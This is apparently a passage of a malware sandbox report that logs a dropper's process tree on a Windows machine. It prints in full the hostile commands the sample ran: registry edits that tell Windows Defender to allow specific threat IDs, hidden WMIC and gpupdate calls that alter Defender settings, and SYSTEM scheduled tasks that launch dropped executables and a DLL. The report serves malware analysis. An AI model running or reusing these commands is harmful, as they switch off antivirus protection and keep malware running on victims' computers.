  schtasks /DELETE /F /TN "aNyMQclguOCSCcjxm"
- C:\Program Files\Google\Chrome\Application\chrome.exe (level 1)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- C:\Program Files\Google\Chrome\Application\chrome.exe (level 2)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f91aab58,0x7ff8f91aab68,0x7ff8f91aab78
- C:\Program Files\Google\Chrome\Application\chrome.exe (level 2)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1620 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:2
- C:\Program Files\Google\Chrome\Application\chrome.exe (level 2)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:8
- C:\Program Files\Google\Chrome\Application\chrome.exe (level 2)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2012 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:8
- C:\Program Files\Google\Chrome\Application\chrome.exe (level 2)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3312 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:1
- C:\Program Files\Google\Chrome\Application\chrome.exe (level 2)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3328 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:1
- C:\Program Files\Google\Chrome\Application\chrome.exe (level 2)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3824 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:1
- C:\Program Files\Google\Chrome\Application\chrome.exe (level 2)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4396 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:1
- C:\Program Files\Google\Chrome\Application\chrome.exe (level 2)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4568 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:8
- C:\Program Files\Google\Chrome\Application\chrome.exe (level 2)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4708 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:8
  - Modifies registry class
- C:\Program Files\Google\Chrome\Application\chrome.exe (level 2)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:8
- C:\Program Files\Google\Chrome\Application\chrome.exe (level 2)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5192 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:8
- C:\Program Files\Google\Chrome\Application\chrome.exe (level 2)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 --field-trial-handle=2472,i,13877333906446788525,18364442118705750497,131072 /prefetch:8
- C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe (level 1)
  "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 98809F80856CDB774CFDFE75223624B12⤵
- Loads dropped DLL
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 9D06CF248F112F08D6ECE29E2AF58D6C E Global\MSI00002⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding FD2C29E60D4E3A3D5A5CF2D35E41C1F2 M Global\MSI00002⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8CF9.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS8CF9.tmp\Install.exe Wt /nOMdidyFFk 385118 /S1⤵
- C:\Windows\SysWOW64\cmd.exe (level 2)
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
- C:\Windows\SysWOW64\forfiles.exe (level 3)
  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
- C:\Windows\SysWOW64\cmd.exe (level 4)
  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
- \??\c:\windows\SysWOW64\reg.exe (level 5)
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
- C:\Windows\SysWOW64\forfiles.exe (level 3)
  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
- C:\Windows\SysWOW64\cmd.exe (level 4)
  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
- \??\c:\windows\SysWOW64\reg.exe (level 5)
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
- C:\Windows\SysWOW64\forfiles.exe (level 3)
  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
- C:\Windows\SysWOW64\cmd.exe (level 4)
  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
- \??\c:\windows\SysWOW64\reg.exe (level 5)
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
- C:\Windows\SysWOW64\forfiles.exe (level 3)
  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
- C:\Windows\SysWOW64\cmd.exe (level 4)
  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
- \??\c:\windows\SysWOW64\reg.exe (level 5)
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
- C:\Windows\SysWOW64\forfiles.exe (level 3)
  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
- C:\Windows\SysWOW64\cmd.exe (level 4)
  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 5)
  powershell start-process -WindowStyle Hidden gpupdate.exe /force
- C:\Windows\SysWOW64\gpupdate.exe (level 6)
  "C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
- C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 00:02:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\eudyWVr.exe\" aV /TwpPdidzV 385118 /S" /V1 /F
  - Creates scheduled task(s)
- C:\Windows\System32\Conhost.exe (level 3)
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks /run /I /tn "yfARWRprRqUFWeTGf"
- C:\Windows\system32\DllHost.exe (level 1)
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
- C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\eudyWVr.exe (level 1)
  C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\eudyWVr.exe aV /TwpPdidzV 385118 /S
- C:\Windows\SysWOW64\cmd.exe (level 2)
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
- C:\Windows\SysWOW64\forfiles.exe (level 3)
  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
- C:\Windows\SysWOW64\cmd.exe (level 4)
  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
- \??\c:\windows\SysWOW64\reg.exe (level 5)
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
- C:\Windows\SysWOW64\forfiles.exe (level 3)
  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
- C:\Windows\SysWOW64\cmd.exe (level 4)
  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
- \??\c:\windows\SysWOW64\reg.exe (level 5)
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
- C:\Windows\SysWOW64\forfiles.exe (level 3)
  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
- C:\Windows\SysWOW64\cmd.exe (level 4)
  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
- \??\c:\windows\SysWOW64\reg.exe (level 5)
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
- C:\Windows\SysWOW64\forfiles.exe (level 3)
  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
- C:\Windows\SysWOW64\cmd.exe (level 4)
  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
- \??\c:\windows\SysWOW64\reg.exe (level 5)
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
- C:\Windows\SysWOW64\forfiles.exe (level 3)
  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
- C:\Windows\SysWOW64\cmd.exe (level 4)
  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 5)
  powershell start-process -WindowStyle Hidden gpupdate.exe /force
- C:\Windows\SysWOW64\gpupdate.exe (level 6)
  "C:\Windows\system32\gpupdate.exe" /force
- C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks /DELETE /F /TN "biPxHmULFllsbMgnpt"
- C:\Windows\SysWOW64\cmd.exe (level 2)
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
- C:\Windows\SysWOW64\forfiles.exe (level 3)
  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
- C:\Windows\SysWOW64\cmd.exe (level 4)
  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 5)
  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
- C:\Windows\SysWOW64\Wbem\WMIC.exe (level 6)
  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
- C:\Windows\SysWOW64\schtasks.exe (level 2)
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zgoZGMcaU\VIwuzw.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHJXtPPPvDXVqpH" /V1 /F
  - Creates scheduled task(s)
- C:\Windows\system32\LogonUI.exe (level 1)
